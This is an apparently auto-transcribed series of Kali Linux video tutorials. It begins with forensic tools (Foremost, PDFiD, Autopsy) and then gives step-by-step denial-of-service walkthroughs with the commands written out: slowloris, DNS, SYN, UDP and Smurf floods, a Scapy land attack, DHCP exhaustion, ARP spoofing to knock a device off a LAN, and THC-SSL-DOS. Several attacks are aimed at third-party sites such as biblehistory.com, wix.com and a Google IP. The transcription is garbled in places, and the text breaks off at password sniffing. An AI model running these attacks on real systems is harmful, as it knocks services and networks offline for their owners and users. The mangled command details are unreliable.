Welcome, in this video we are going to learn Foremost forensic tool in Linux. Foremost is a forensic program to recover lost files based on their headers, footers and internal data structures. Foremost can work on image files such as those generated by DD, SafeBack, Encase, etc. or directly on a drive. The headers and footers can be specified by a configuration file, or you can use command line switches to specify built-in file types. These built-in file types look at the data structure of a given file format, allowing for a more reliable and faster recovery. Let's open up terminal and type foremost -h. Here you can see that the basic usage of Foremost tool, foremost -v, -h, -t, -q in upper and lower cases, -t type, -s logs, -k size, -b size, -c file, -o for directory, -i for file. Let's see basics option for foremost. -v display the copyright information and exit. -t specify the file type. -d turn on indirect block detection. -i specify input file. -e write all headers, perform no error detection, and so on. Let's search for a selection of file types in the given image file. Foremost -t doc, jpg, pdf, xls, -i image.ddd. Here you can see that the processing on the image.dd file. After you can check with the output directory, all doc, jpg, pdf, xls files are saved in output directory. So that's it in this video on Foremost forensic tool in Linux. Thank you for watching this video. Welcome, in this video we will see PDF ID tool, which is a forensics tool in Linux. This tool is not a PDF parser, but it will scan a file to look for certain PDF keywords, allowing you to identify PDF documents that contain JavaScript or execute an action when opened. PDF ID will also handle name obfuscation. The idea is to use this tool first to track PDF documents and then analyze a suspicious one with my PDF parser. An important design criteria for this program is simplicity. Parsing a PDF document completely requires a very complex program, and hence it is bound to contain many bugs to add the risk of getting exploited. PDF ID will scan a PDF document for a given list of string and count the occurrence of each word. That is object, end of object, stream, end stream, X reference, trailer, start X reference, page, encryption, JavaScript, open action, rich media, launch, XFA, and so on. Almost every PDF document will contain the first 7 words, that is object through start X reference, and to lesser extent stream and end stream. The page gives an indication of number of pages in PDF document. Most malicious PDF documents have only one page. Encrypt indicates that the PDF document has DRM or needs a password to be read. Object STM counts the number of object streams. An object stream is a stream object that contains other objects and can therefore be used to obfuscate objects. JS and JavaScript indicate that the PDF document contains JavaScript. Almost all malicious PDF documents that are found in the wild contain JavaScript. To exploit JavaScript vulnerability or to execute a heap spray. And of course you can also find JavaScript in PDF documents without malicious intent. AA and open action indicate an automatic action to be performed when the page or document is viewed. All malicious PDF documents with JavaScript I have seen in the wild had an automatic action to launch the JavaScript without user interaction. The combination of automatic action and JavaScript makes a PDF document very suspicious. JBIG2 decode indicates if the PDF document uses JBIG2 compression. This is not necessarily indication of malicious PDF document, but requires further investigation. Rich media is for embedded flash. Launch counts launch action. XFA is for XML forms architecture. A number that appears between parentheses of the counter represents the number of obfuscated occurrences. Let's do some practical. Let's open up the terminal and type PDF ID. Here you can see that the basic syntax of PDF ID tool, PDF ID, options, PDF file, zip file, URL @file. Options for PDF ID tool, that is --, version shows program version number and exit, -h shows this is help message and exit, -s scan the given directory, -e display all the names, -e display extra data like dates, -f force a scan of the file even without proper PDF header, and so on. Let's scan the desktop directory using -s option. So type PDF ID space -s root desktop. You can see that scanning the PDF files in desktop directory and welcome.pdf file is found. Now let's analyze the welcome.pdf file. Type PDF ID root desktop welcome.pdf. Here you can see that object and end object number of object stream is 918. Stream and end stream is 767, and so on. Using --, version option, we can see the version of the tool. So type PDF ID space --, version. Here you can see that PDF ID version 0.2.1. So that's it in this video on PDF ID package, which is a forensic tool in Linux. Thank you for watching this video. Welcome. In this video we will see PDF ID tool, which is a forensics tool in Linux. This tool is not a PDF parser, but it will scan a file to look for certain PDF keywords, allowing you to identify PDF documents that contain JavaScript or execute an action when opened. PDF ID will also handle name obfuscation. The idea is to use this tool first to track PDF documents and then analyze a suspicious one with my PDF parser. An important design criteria for this program is simplicity. Parsing a PDF document completely requires a very complex program, and hence it is bound to contain many bugs to add the risk of getting exploited. PDF ID will scan a PDF document for a given list of string and count the occurrence of each word. That is object, end of object, stream, end stream, X reference, trailer, start X reference, page, encryption, JavaScript, open action, rich media, launch, XFA, and so on. Almost every PDF document will contain the first 7 words, that is object through start X reference, and to lesser extent stream and end stream. The page gives an indication of number of pages in PDF document. Most malicious PDF documents have only one page. Encrypt indicates that the PDF document has DRM or needs a password to be read. Object STM counts the number of object streams. An object stream is a stream object that contains other objects and can therefore be used to obfuscate objects. JS and JavaScript indicate that the PDF document contains JavaScript. Almost all malicious PDF documents that are found in the wild contain JavaScript to exploit JavaScript vulnerability or to execute a heap spray. And of course, you can also find JavaScript in PDF documents without malicious intent. AA and open action indicate an automatic action to be performed when the page or document is viewed. All malicious PDF documents with JavaScript I have seen in the wild had an automatic action to launch the JavaScript without user interaction. The combination of automatic action and JavaScript makes a PDF document very suspicious.
JPEG2 decode indicates if the PDF document uses JPEG2 compression. This is not necessarily indication of malicious PDF document, but requires further investigation. Rich media is for embedded flash. Launch counts launch action. XFA is for XML forms architecture. A number that appears between parentheses of the counter represents the number of obfuscated occurrences. Let's do some practical. Let's open up the terminal and type PDF ID. Here you can see that the basic syntax of PDF ID tool, PDF ID, options, PDF file, zip file, URL @file. Options for PDF ID tool, that is --, version shows program version number and exit, -h shows this is help message and exit, -s scan the given directory, -e display all the names, -e display extra data like dates, -f force the scan of the file even without proper PDF header, and so on. Let's scan the desktop directory using -s option. So type PDF ID space -s root desktop. You can see that scanning the PDF files in desktop directory and welcome.pdf file is found. Now let's analyze the welcome.pdf file. Type PDF ID root desktop welcome.pdf. Here you can see that object and end object number of object stream is 918. Stream and end stream is 767 and so on. Using --, version option, we can see the version of the tool. So type PDF ID space --, version. Here you can see that PDF ID version 0.2.1. So that's it in this video on PDF ID package, which is a forensic tool in Linux. Thank you for watching this video. Welcome. In this video we are going to learn Galetta, which is a forensic tool in Linux. Galetta is a forensic tool that examines the content of cookie files produced by Microsoft Internet Explorer. It parses the file and outputs a field separated that can be loaded in spreadsheet. Let's open up Galetta application, forensics, Galetta, and Internet Explorer cookie forensics analysis tool. Here you can see that basic usage of Galetta. Options, file name, -d option for field delimiter. Let's read file.txt and output the content using semicolon as field delimiter. Type Galetta -d semicolon root desktop cookie.txt. Here you can see that cookie text file details to which you can add any cookie text file and analyze it easily. So that's it in this video on Galetta forensic tool in Linux. Thank you for watching this video. Welcome. In this video we will see PD-Gmail, which is forensic tool in Linux. From a PD process memory dump, it will find what it can out of the memory image, including contacts, emails, last access times, IP addresses, etc. So let's start. First open terminal and type PD-Gmail space -h to open PD-Gmail. Here you can see the options, -f for file, -b for bodies, -h help, -v verbose, -v version, that is prints just the version info and exits. This expects to be unleashed on the result of running string -el on a PD dump from Windows process memory. Anything other than that, your mileage will certainly vary. Extract artifacts from the file, file.dmp and verbose. So type PD-Gmail
space -v -f root desktop file.dump. So that's all in this video on PDGmail forensic tool in Linux. Thank you for watching this video. Welcome. In this video we are going to learn Autopsy forensic tool in Linux. Carrier is one of the leading authorities on operating system file system. Autopsy was built to sit on top of SleuthKit to offer an intuitive graphical based forensic suite that utilizes the strength of SleuthKit while at the same time offering the basics of a case management tool. Let's open up Autopsy tool, application, forensic, Autopsy, copy the link, that is localhost 999 Autopsy. Let's open up browser. This will simply take us to local web server on your system and access port 999 where Autopsy is running. Autopsy is a just graphical user interface overlay on top of Pre and Carrier's excellent suite of forensic tool. Let's create a new case. We'll need to create a case and organize all of our evidence and information. In this regard, Autopsy requires that you start a case to get started. I'm giving this case a numerical case name and a description of hacking dude, and I have provided my name as the investigator. Please note that I can provide up to 6 investigator names. In a real forensic investigation, you will seldom be working alone. Let's click on next. Here you can see that simply gives us a name of the case where the case will be stored, that is variable library autopsy 100, and where its configuration file will be stored, that is variable lib autopsy 100 case.aut. Now click on add a host button. Type hostname as host1 and description as new case. Time zone as GMT, time skew adjustment as 0. Let's click on add host. Here you can see that host is added. Now add an image file. We need to import an image file. An image file is a bit by bit copy of storage device that we captured for the evidence when we arrived at the crime scene. It can import that image of autopsy by giving it the location where I saved the image, that is root desktop google.png. Tell autopsy what type of image type disk, and import method copy. Let's type image path as. Click on next. Whenever we are creating an image or saving an image that might be used in any legal proceeding, it is critical to make certain that we can maintain the integrity of the image. This means that we can prove that the image has not been tampered with from the time that the image was captured until the time of the trial. Let's select volume image option. Click on OK. Here you can see that case details for 100 be saved. We can see that case details and host details. So that's it in this video on Autopsy forensic tool in Linux. Thank you for watching this video. Welcome. On this video we will see how to do DOS attack on website using Sloris using Linux. First, let us know what is Sloris. Sloris is a type of denial of service attack tool invented by Robert R. Snick Hansen, which allows a single machine to take down another machine's web server with minimal bandwidth and side effects
on unrelated service and ports, which I had already described in previous video. Anyhow, I just reminded. So let's see in this video how to do it on Linux. So let's start. Open the browser and type slowloris.pl space github to download the tool. Next, click on GitHub link as shown below. Here it opened. To get a clone of that tool, click on clone download, copy that clone address. Now open a terminal in Linux. Now set a path where you want to save the file. To save on desktop, type cd space desktop. Now type git space clone https github.com/slowloris.pl.git. To get the clone of the tool, here you see the clone of the tool is saved on desktop. Now to enter cloned folder, type cd space slowloris.pl. Now type ls to see the content of the folder. Now type chmod a+x slowloris.pl. Now next type ls. To start slowloris, type /slowloris.pl. Here you see it started. Now before the attack, start Apache 2 service, that is service space Apache 2 space start. The service is started. Now to attack, we need IP address of the target. So I'm assuming my own website to do this attack. So to know the IP address of the target, send a ping, open new terminal and type ping www.hacking2.com. This is my own website. Get your own website to do it. Don't try on some other's website. Here you see the IP address of the target. Now type to start attack, that is /slowloris.pl space -DNS 107.180.54.186. Here you see the attack is started. Let's check it's working or not. Here you see it's working. So that's it in this video on how to do DDoS on a website using slowloris in Linux. Thank you for watching this video. Welcome. In this video we're going to learn DNS flooding using birthday Perl script in Linux. Let's open up terminal and here I'm changing terminal directory to desktop. Type cd space attack. Let's see the attack directory files and subdirectories. Here you can see that birthday.pl. Here I'm downloading attack.save file from GitHub Summit attack. I have extracted and saved in desktop. Type perl birthday.pl. Here you can see that basic usage of birthday flooding script. Birthday.pl source IP, destination IP, source underscore port, domain, spoofed IP, number of packets. Let's open up another terminal, type if config. Here you can see that IP address 192.168.0.6, type nmap hacking2.com. Here you can see that hacking2.com filtered ports. Type perl birthday.pl 192.168.0.6, 107.180.54.186, 22 SSH port, hacking2.com 192.168.0.4, send 10,000 packets. Let's open up Wireshark Network Analyzer, select LAN 0 mon interface, click on Start button. Now back to terminal, click on Enter. Here you can see that in Wireshark DNS flooding with different source addresses. So that's it in this video on DNS flooding with birthday Perl script in Linux. Thank you for watching this video. Welcome. In this video we are going to learn Sage, which is DOS attack tool in Linux. Sage is an open source regression test and benchmark utility. It can stress test a single URL with a user-defined number of simulated users, or it can read many URLs into memory and stress them simultaneously. The program reports the total number of hits recorded, bytes transferred, response time, concurrency, and return status. Site supports HTTP 1.0 and 1.1 protocol. the get and post directives, cookies, transaction logging, and basic authentication. Its features are configurable on a per user basis. Let's open up terminal and type Sage. Here you can see basic usage, Sage options, options URL, Sage-G URL, and some of the basic options are -C, that is config, configuration, show the current config, -V verbose, verbose prints notification to screen, -Q, that is quiet, quiet turns verbose off and suppresses output, -G get pull down HTTP headers and display the transaction, great for application debugging, and so on. Now I'm going to get pull down HTTP headers and display the transaction. This tool great for application for debugging. Type Sage-G youtube.com and hit enter. Here you can see it started. We get header as HTTP 1.0, mode permanently, and so on, set cookie, and so on, transaction 6 hits, availability 100%, and so on. So that's it in this video on Sage, which is DOS attack tool in Linux. Thank you for watching this video. Welcome. In this video we are going to learn slow HTTP test, which is DOS attack tool in Linux. Slow HTTP test is a highly configurable tool that simulates some application layer denial of service attacks by prologging HTTP connections in different ways. Use it to test your web server for DOS vulnerabilities or just to figure out how many concurrent connections it can handle. Slow HTTP test works on majority of Linux platforms, OS X and Cygwin, a Unix-like environment and command line interface for Microsoft Windows, and comes with a Docker file to make things even easier. Let's open terminal. Let's download latest slow HTTP test. Type git clone github.com/slow HTTP test.git. Here we can download and install from GitHub. Otherwise type apt-get install slow HTTP test. It is downloaded from Kali FTP and automatically installation. Here you can see that installation is started. Type slow HTTP test space -h, basic usage as slow HTTP test space options. Let's see the basic option. Test modes -h slow headers aka slow loris, -b slow body aka are you dead at. Reporting option -g generate statistics with the socket state changes, -o file underscore prefix save statistics output in file.html and file.csv, and so on. Let's test DOS attack on biblehistory.com. Type slow HTTP test -c 1000-x-r 1000-w 10 -y 20 -n 5 -z32 -u http biblehistory.com -p 5 -l 350 -e x.x.x 8080 space -g. Let's open up biblehistory.com website. Here you can see that working is fine. Click on enter. DOS attack is started. This tool will show you each second pending packets and connected status and so on. Once attack is done, we can see that reports in CSV and HTML format. Let's open up CSV report. Here you can see that each second closed, pending, connected, service availability report. Let's open up HTML report. Here you can see that results against pivalhistory.com report in graph format. So that's it in this video on slow HTTP test, which is DOS attack tool in Linux operating system. Thank you for watching this video. Welcome. In this video, we will see paint menu tool for DDoS attacking in Linux. It's a bash script inspired by Pentbox, designed to be a simple way to implement various networking pentesting functions, including network attacks, using wherever possible readily available software commonly installed on most Linux distributions without having to resort to multiple specialist tools. So let's start. Let's open browser and search paint menu GitHub. Click on https github.com ginja paint menu. Let's copy the git link. Back to the Kali desktop. Open up terminal and change directory to desktop. Type cd space desktop. Type git clone and paste here copied link. Here you can see cloning is started. Download is completed. Let's change terminal directory to paint menu. Type cd space paint menu. Type ls. Here you can see that paint menu directory files. Let's run paint menu file. Type /paint menu to run paint menu. Paint menu is started. Here you can see the modules, that is recon, DOS, extraction, view readme, and fifth quit. Select 2 by selecting 2. Here you can see that 9 DOS attacking options are available. First one is TCP SYN flood, second TCP ACK flood, third TCP RST flood, fourth TCP XMAS flood, and so on. Here I am attacking with TCP SYN flood. Select 1 for TCP SYN flood. Now open a new terminal and type nmap spacecall.com to check open ports. Copy IP address, paste in another terminal. Next enter 443. Next type R. Random IP address. Type S for send data with SYN packet. Enter number of data bytes to send. I'll write 100000 and enter. Now go to application Wireshark. Next select interface line 0 and start Wireshark. You can see attack is started. Here you see Wireshark is analyzing packets. Press Ctrl+C to stop the attack. Let's attack DDoS using UDP flood. Type fifth option. Let's enter target IP address 192.168.1.1. Here I am typing target port as 80. Type hello message. Here you can see that source address IP, random or interface. Here I am selecting random IP address. Let's open up Wireshark. Here you can see that DOS attack is started here. So that's it in this video on paint menu DDoS attacking tool in Linux. Thank you for watching this video. Welcome. In this video we are going to learn Linux to DOS and DOS to Linux reporting tools in Linux. This package contains utilities DOS to Linux, Unix to DOS, Mac to Unix, Unix to Mac to convert the line endings of text files between Unix, DOS, and Mac formats. Text files under Windows and DOS typically have two ASCII characters at the end of each line. CR, that is carriage return, followed by LF, that is line feed. Older Macs used CR while Unix uses just LF. While most modern editors can read all these formats, there may still be a need to convert files between them. This is a classic utility developed in 1989. Let's open up terminal and type Unix to DOS space -h, convert from Unix to DOS. Here you can see that basic usage for Unix to DOS, options file, -n in file, output file. Basic options are -ASCII, convert only line breaks, -ISO conversion between DOS and ISO character set, and so on. Let's convert a Unix text file in DOS format. For that, type unix to DOS -n, that is new file creation, root desktop usernames.txt, root desktop username dos.txt. Here you can see that usernames.txt file is generated in DOS format as username dos.txt. Now let's convert DOS file to Unix text file format. For that, DOS to Unix space -n root desktop username dos.txt, root desktop username unix.txt. Here we can see that username dos.txt file is generated in Unix format username unix.txt. So that's it in this video on Linux to DOS and DOS to Linux, your reporting tool. Thank you for watching this video. Welcome. In this video we are going to learn ping testing network connection in Linux. The ping command is used to test the connection and latency between two network connections. These connections can be either in the local area network or a wide area network or the internet as a whole. The ping command sends packets of information to a specified IP address and then measures the time it takes to get a response from the specified computer or device. Ping can also be used in a multi-user LAN to see if a particular user is online in the system, where all system has database support for all the local users. You can also run a remote ping. This allows you to ping an IP address or computer from a computer other than yours to see if the problem may be associated with your local connection other than the IP address you are trying to connect to. Let's open up terminal and type ping space -h. Here you can see that basic usage with options, that is ping options, -c count, -i interval, and so on. Type the IP or website address that you want to ping. If you want to ping Google, type www.google.com after the space. If you want to ping your router, it might be 192.168.0.1. Type ping 192.168.0.1. Hit enter. If the website is up and actively responding, you receive replies back from the server that you pinged. You get the information like the IP address, the number of bytes sent, the time it took in milliseconds. The TTL is time to live. This indicated the number of hops back from computer pinged from that computer's initial TTL value. Press Ctrl+C to stop the command operation. Here you can see that lower the round trip number in milliseconds, the better. Higher the round trip number in milliseconds, higher the latency, which may indicate a network problem between your computer and the server you pinged. So that's it in this video on ping testing network connection in Linux. Thank you for watching this video. Welcome. In this video we are going to learn Scapy stress testing tool Linux. Scapy is a Python interpreter that enables you to create, forge, or decode packets on the network, to capture packets and analyze them, to dissect the packets, etc. It also allows you to inject packets into the network. It supports a wide number of network protocols and it can handle and manipulate wireless communication packets. Scapy can be used to perform the jobs done by many network tools such as Nmap, hping, ARP-scan, and T-Shark. The concept behind Scapy is that it is capable of sending and receiving packets and it can sniff packets. The packets to be sent can be created easily using built-in options and the received packets can be dissected.
Sniffing of packets helps in understanding what communication is taking place on the network. So let's start. Open up the terminal in Linux and type scapy. Here it is showing warning that no route found for IPv6 destination, no default route, info, can't import Python ESDSA lib, disabled certificate manipulation tools. Let's create ICMP packet and send to 192.168.0.6 IP address. So send IP DST equals to 192.168.0.6 ICMP. This is an ICMP packet. Send one packet. So that's it in this video on scapy for stress testing tool in Linux. That's all. Thank you for watching this video.
Welcome. In this video we will learn T50, which is stress testing tool in Linux. T50 is a tool designed to perform stress testing. The concept started on 2001 right after release of NB ISA KMP.c. The main goal was having a tool to perform TCP or IP protocol fuzzer covering common regular protocol such as ICMP, TCP and UDP. It is a multi-protocol packet injector tool for Unix system actually supporting 15 protocols. Features: flooding, CIDR support, TCP, UDP, ICMP, IGMP v2, IGMP version 3, EGP, TCCP, RSVP, RIPv1, RIPv2, GRE, ESP, EH, EIGRP and OSPF support. TCP options high performance, can hit about 10 lakh packets per second. Let's open terminal and type T50 space -h. Here you can see basic usage, T50 host, CIDR, options and common options, threshold num, threshold of packets to send, -flood. This option supersedes the threshold and so on. GRE options, -gre, -sequence, -present, GRE, sequence, present, default off, -gre, key present, GRE, cry present, default off, and so on. DCP or TCP, $UDP options, -sport num, -dport num, which are the source port and destination port. TCP options, IP option, ICMP option, EGP option, RIP option, DCCP option, RSVP option, IPSEC option, EIGRP options, and so on. Some considerations: while running this program, there is no limitation of using as many options as possible. Report T50 bugs at GitHub link. Some header fields with default values must be set to 0 for random, and so on. Now I'm going to supersede the threshold. Type T50 216.58.197.78 -flood. Here you can see it started entering flood testing, successfully launched. Now open new terminal and type T50 107.180.54.186, successfully launched. So that's all in this video on T50 stress testing tool in Linux. Thank you for watching this video.
Welcome. In this video we are going to learn scapy to perform to discovery. Packet manipulation tools can be very effective for network scanning such as Nmap and hping. Any packet crafting or manipulation tool can also be used for DOSing, that is denial of service attacks. Given the power of creating
just about any type of packet with any characteristics. We can likely find one that will take down a host or network. A new tool called Scapy for doing scanning and dosing weapons. Scapy is a packet manipulation tool similar to Nmap and HPing, but unlike those other tools, Scapy is almost infinitely customizable. This is not to say that Nmap and HPing are not customizable, but their ability to be customizable is limited. They trade off ease of use for customization. Scapy, on the other hand, has almost no limits in your ability to customize it, but it does have a bit of a learning curve. If you invest the time to understanding the Scapy, you will be rewarded with a very powerful weapon. Let's understand TCP or IP. When using a tool like Scapy, Nmap, HPing and others, it is critical you understand the structure of both the IP header and the TCP header. Without that fundamental knowledge of these protocols, it is trying to fly an F-16 into war zone without basic and fundamental flight training. It is a powerful weapon and you might unleash a bomb or two, but you are likely to crash and burn as well. You should be familiar with the TCP header and packet as well. The better you understand the structure of these headers and packets, the better hacker you will be. Otherwise, you will be limited to being a script kiddie with some powerful tools and no knowledge to use them effectively. Scapy is also very versatile. It can be customized to do ARP spoofing, ARP cache poisoning, packet sniffing and analysis like TCP dump and Wireshark, injecting 802.1 frames like AirPlay NG, and decoding VoIP like Kane and Abel. It is written in Python by Philip Biondi and is capable of crafting packets as well as decoding packets. Its syntax is a bit obscure, but its power makes it worth investing the time to learn. In next video, we will try to introduce you first to Scapy syntax and then we will use it for a simple yet effective DOS attack. That's it in this video on Scapy to perform layer 2 discovery in Kali Linux tool. Thank you for watching this video. Welcome. In previous video we learned Scapy introduction and understanding of TCP or IP. Let's open up terminal and type Scapy space -h. Here you can see that basic usage, scapy.py, options -c session file, -c new startup file, and so on. Type Scapy. Notice the symbol that is greater than prompt. This indicates that the Scapy is in interactive mode. All commands after this will be Scapy commands and will be interpreted by the Scapy interpreter. Type conf. Scapy reveals its configuration file. When we type conf in, we'll work with this configuration file in Scapy. Let's create a packet. The beauty of Scapy is its ability to custom build any packet you can imagine. Generally, the TCP or IP stack of your OS will build RFC compliant packet whenever you want to communicate over the internet. As a hacker, we often want to create a custom or unique packet that may not be RFC compliant for the purposes of gathering information on our target, or possibly creating a DOS condition by creating a packet that causes the target system to crash. Let's start by creating a simple IP packet. First declare a variable that represents your packet and then define the packet attributes one by one. So here we define our packet as X and then give X multiple attributes. Let's begin by defining X as an IP packet.
with a TTL of 64. Type X is equal to IP, TTL equals to 64. Here I have created the variable X and defined it as an IP packet with a time to live of 64. Type X variable, it is responding with the value of X. IP time to live equals to 64. Let's add some additional attribute to this variable X, such as source and destination IP address. The syntax is similar to Wireshark or TCP dump. We learned this in earlier videos. Represent the source IP attribute with x.src and destination IP attribute with x.dst. Type x.src source addresses. Let's open another terminal. Type ifconfig. Here you can see that my IP address as 192.168.154.246. Copied 8. Paste our IP address here. Here you can see that source address is set. Now I'm going to set destination address as 216.58.197.46. Type x.dst equals to 216.58.197.46. Let's check this by now tapping the variable X. Here you can see that we have created a packet with TTL equals to 64. Source IP is 192.168.154.246. Destination IP is 216.58.197.46. Scapy has large number of built-in functions. We can list these functions. Type lsc have displayed the first of these functions above and the last of these functions. Let's use it to send the packet we created above called X that has attribute of TTL equals to 64. Source IP is 192.168.154.246. Destination IP is 216.58.197.46. When you send this packet, it will go to the destination IP address and will have a limit of 64 hops, that is TTL equals to 64. Type send X. You can see our specially crafted packet X was sent to destination IP address. We can use Scapy to craft a packet with just about any value in any of the IP header or TCP header field, such as window size, flags, fragmentation field, acknowledgement files, sequence number, etc. That's it in this video on Scapy to perform layer 2 discovery in Linux tool. Thank you for watching this video. Welcome to the Scapy to perform layer 2 discovery Linux part 3. In this video, we are going to learn create an attack using Scapy. Now that you have some getting idea that Scapy to be used to manipulate any of the fields in the TCP or IP packet, we'll play with some of the other fields in a subsequent Scapy. Let's use this capability to create a malicious packet and then send it to a target system. This is a DOS attack that sends an oversized packet to the target with the same source and destination IP address and the same source and destination port. It doesn't always crash the system, but will slow it down considerably. For web servers, slowing them down is effectively a DOS. Let's create that land attack packet in Scapy. Scapy can take all of the attributes in a single command. Let's create our land attack packet and send it 2000 times. Type send IP src equals to 192.168.154.246. DST equals to 216.58.197.46. TCP S port equals to 80. D port equals to 80. Count equals to 1000. Send is the command. IP defines the protocol for IP addresses. It can crash the system or at least slow it down dramatically. When a web server is slowed, it effectively DOSes the website. Scapy is yet another powerful scanning and dosing tool in our set of tools. Scapy is incredibly versatile, enabling us to do multiple tasks with this single tool. It has almost an unlimited ability to create packets with any characteristics you can imagine and thereby create a unique scanning technique and DOS attacks. So that's it in this video on Scapy to perform layer 2 discovery, creating an attack using Scapy. Thank you for watching this video. Welcome, in this video we are going to learn DHCPig stress testing tool in Linux. DHCPig initiates an advanced DHCP exhaustion attack. It will consume all IPs on the LAN, stop new users from obtaining IPs, release any IPs in use, then for good measure send gratuitous ARP and knock all Windows hosts offline. It requires Scapy greater than or equals to 2.1 library and admin privileges to execute. No configuration necessary, just pass the interface as parameter. It has been tested on multiple Linux distributions and multiple DHCP servers. Pig.py is DHCP exhaustion script. Let's open terminal and type pig.py. Here we can see that basic usage of DHCPing tool, pig.py-h-v-6-1-s and so on. This tool written in Python script. Basic options are -h for help, -v for verbosity, minimal 10, default 99, debug -6, -1, -v6 rapid commit, enable rapid commit and so on. Open up another terminal, type ifconfig. You can see that ETH0 interface. Let's exhaust all of the available DHCP addresses using the ETH0 interface. Type pig.py space ETH0. Here we can see that DHCP addresses using the ETH0 interface. DHCP pool is exhausted. So that's it in this video on DHCPig stress testing tool in Linux. Thank you for watching this video. Welcome, in this video we are going to learn how to perform denial of service attack on any website or machine to bring it down or crash it by using Linux operating system. In previous video we did on Windows operating system. In this video we are doing it on Linux operating system. So let's begin. First I will open the browser and type slowloris.pl space GitHub to download the tool. I'll click on GitHub link. Here it's open. To get a clone of the tool, I'll click on clone download. Copy that clone address. I will open a new terminal in Linux. Now set a path where you want to save the file. To save on desktop, I will type cd space desktop. I will type git space clone https github.com slowloris.pl.git. This we did to get the clone of the tool. Here you can see the clone of the tool is saved on desktop. Now to enter the clone folder, we'll type cd space slowloris.pl. Now type ls to see the content of the folder. Now we'll type chmod a+x slowloris.pl. Now next we'll type ls. To start slowloris, I will type /slowloris.pl. You can see it started. Now before the attack start, we have to start Apache 2 service, that is service Apache 2 start. The service is started. Now to attack we need IP address of the target, so assuming my own website to do this attack. So to know the IP address of target, I'll send a ping, that is I will open terminal and type ping www.hackingtude.com. You can see the IP address of the target. I will type to start the attack, that is slowloris.pl -dns 107.180.54.186. You can see the attack is started. Now let's check it's working or not. You can see it's working. So in this way, one can do DOS attack on a website using slow low res by using Linux operating system. So that's it in this video. Thank you for watching this video. Welcome. In this video, we will see Smurf attack. Smurf attacks can be devastating both to the victim network and to the network used to amplify the attack. An Internet Control Message Protocol Smurf attack is brute force attack on the direct broadcast feature that is built into the IP protocol. The players in this type of denial of service attacks include the following, that is hacker, the intermediary also known as amplifier, and third, the victim. Let's see how a Smurf attack works. A Smurf attack is not terribly sophisticated, it's just a matter of routing and letting IP take its course. The attack usually unfolds in 5 simple steps. That is, first, hacker identifies a victim IP address. The web server is usually a nice high-profile target. Then the hacker identifies an intermediary site that will amplify the attack. Usually several are selected to further disguise the attack. Hacker sends a large amount of ICMP, that is ping layer 3 traffic, at the broadcast address of the intermediary sites. These packets have the source IP address spoofed to the point towards the victim. Fourth, intermediary delivered the broadcast at a layer 2 to all the hosts on their subnet. Fifth, the host replied to the victim network. Now we are going to learn how the Smurf attack is done by Linux. Let's begin. First, open browser, type the website address on which you want to target. Here I am taking my own website. Let's check the website is working or not. Here it's working. Now open the Linux, go to terminal, type ping www.hackingdude.com to see the IP address of the target website, getting a response from the website. Let's stop this by clicking Ctrl+C and copy the IP address of the website. Now type in terminal hping3-1-flood space -- spoof target IP address, copy the address and paste target place broadcast IP address. To get broadcast IP address, open a new terminal and type ifconfig. Here you can see the broadcast address. Copy that and paste in broadcast place after target IP address. Before start, let's check once again the website is working or not. Here it's working fine. Now come back to the Linux. We need Wireshark to observe the packets and source address and destination address. To open Wireshark, go to application, then go to sniffing and spoofing, and then go to Wireshark. Now select ATH0. Before start the Wireshark, go to terminal, hit the enter. As you see, it has started to flood the ICMP packets. Now start the Wireshark. Let's check our website is working or not. You see it's taking to load. Here you see the website has gone down. Now open the Wireshark to see captured packets. Here you see ICMP packets are transmitted. So see in the source side it is showing the victim IP address, and at destination side it's showing broadcast address. Now go to Internet Control Message Protocol, expand it by clicking plus. Here it's showing the ping request and all details. Now return to the terminal. Let's stop this by Ctrl+C. You can see that 18386 packets are transmitted. Now come back to our website. Now it's working again. So that's it in this video on Smurf attack. Thank you for watching this video. Welcome. In this video we are going to learn how to remove unnecessary device from a LAN. Let's start. I'm showing the demo on my PC only. So first, open YouTube, Facebook. They're working fine. Now open Kali and go to terminal and type echo1, this symbol, PROC, system, net, IPv4, IP forward. Now to start to send ARP spoof packets to target machine, type ARP spoof, it is 0, it is target IP-R gateway IP. So to check target IP, open command prompt, type ipconfig. Here this is our target IP. Now we want gateway IP. Let's check gateway IP. Open new terminal and type netstat space -nr. Here you see gateway IP. Copy that IP and paste in place of gateway IP. Let's start. You can see spoof packets are sending to target IP. Let's check it's working or not. It's working. That's it in this video on kick out the unnecessary device from LAN. Thank you for watching this video. Welcome. In this video we will learn how to do a swine flood attack on a website. As we did on a machine in a previous video, it's the same way for the website. I have made this video because some student asked a method on attacking a website. So it's basically same, I'll just demonstrate it. Here I'm using bbox to show the swine flood attack. If you have no idea about bbox, do check previous videos in this tutorial or beginning videos of this tutorial to know what is bbox. It basically hosts a website as a server. So first I will open up bbox and go to terminal and type ifconfig to know the IP address. If you copy paste and load this IP address, the bbox website, that is bwap, will load up, which you will see later on. So let's start a swine flood attack. In Kali Linux, I'll open terminal and run Metasploit. To run Metasploit, first I will start service postgresql start. Without this we can't run Metasploit. To run Metasploit, I will type msf console in terminal. There are 907 auxiliary. Then I will search for swine flood. There you get location of swine flood auxiliary, that is auxiliary.tcp swine flood. So I will type use auxiliary.tcp swine flood. To check the ports, enter show options. As you see, I already nmapped the target machine. Now set our host 192.168.163.128. Then set our port. Here I am using port which we got from doing Nmap. Do watch previous video in this course where I have nmapped this bbox and port was open when I did Nmap. To verify, I will type show options and last I will type exploit. The flooding has begun. So this is the IP address on which you are flooding. The website is hosted on this one. Let me open the bwap. You can see it's not opening up because we have set up a swine flood attack on this IP address. So it's basically denying our request. So this is the result or output of a swine flood attack on a website. It results into denial of service. So that's all about a swine flood attack on a website. Thank you for watching this video. Welcome. In this video we are going to learn how THC SSL DOS attack is done. Let's start. First open a website where you want to do the attack. Here I am using www.wix.com. Now open terminal in Kali. Let's see this website is talking with your PC or not by sending ping. Here it's working fine. Now go to application, select THC SSL DOS. Now copy IP of target website, type THC SSL DOS target IP, enter. Here it begins sending handshaking packets to the server. Here you can see the website is getting slow. After some time it goes down. So that's all about THC SSL DOS attack in this video. Thank you for watching this video. Welcome. In this video we are going to see how to sniff password using Wireshark. Wireshark is a free and open source packet analyzer. It is used for network troubleshooting, analysis, software and communication protocol development. It was originally named Ethereal. The project was renamed as Wireshark in May 2006 due to trademark issues. To download Wireshark tool, open a browser and type wireshark.org. Here you can see Wireshark official website. Click on download option and download Wireshark tool according to your system configuration. As you can see, it's downloaded. Now install this. After the installation, let's open it up. Now we need to select interface to capture the traffic. So go to capture and select interface. Click on start to start capture packets. As you can see, it started. Now let's access website. Here you can see in Wireshark terminal, it's capturing the packets. Now select any packet to see in detail. Now let's see how to sniff passwords in Wireshark. So open login page 